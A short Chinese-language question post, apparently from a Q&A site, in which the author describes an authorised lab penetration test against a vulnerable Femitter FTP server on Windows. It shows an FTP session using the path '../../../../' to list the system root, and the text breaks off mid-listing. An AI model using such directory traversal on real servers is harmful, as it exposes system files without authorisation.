我在封闭的参考环境中进行了一个受认可的渗透测试,并在一个看似简单的问题上挣扎,我目前无法解决。
当尝试对运行在 MS Windows 操作系统上的易受攻击的 Fermitter FTP 服务器执行目录遍历攻击时,可以在系统根目录上执行 LIST(地址和内容列表在这里更改仅供参考):
# ftp 192.168.13.22
Connected to 192.168.13.22.
220 Femitter FTP Server ready.
Name (192.168.13.22:root):
331 Password required for root.
Password:
230 User root logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ../../../../
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 0 Sep 23 2015 AUTOEXEC.BAT
-rw-rw-rw- 1 ftp ftp 0 Sep 23 2015 CONFIG.SYS
drw-rw-rw- 1 ftp ftp …Run Code Online (Sandbox Code Playgroud)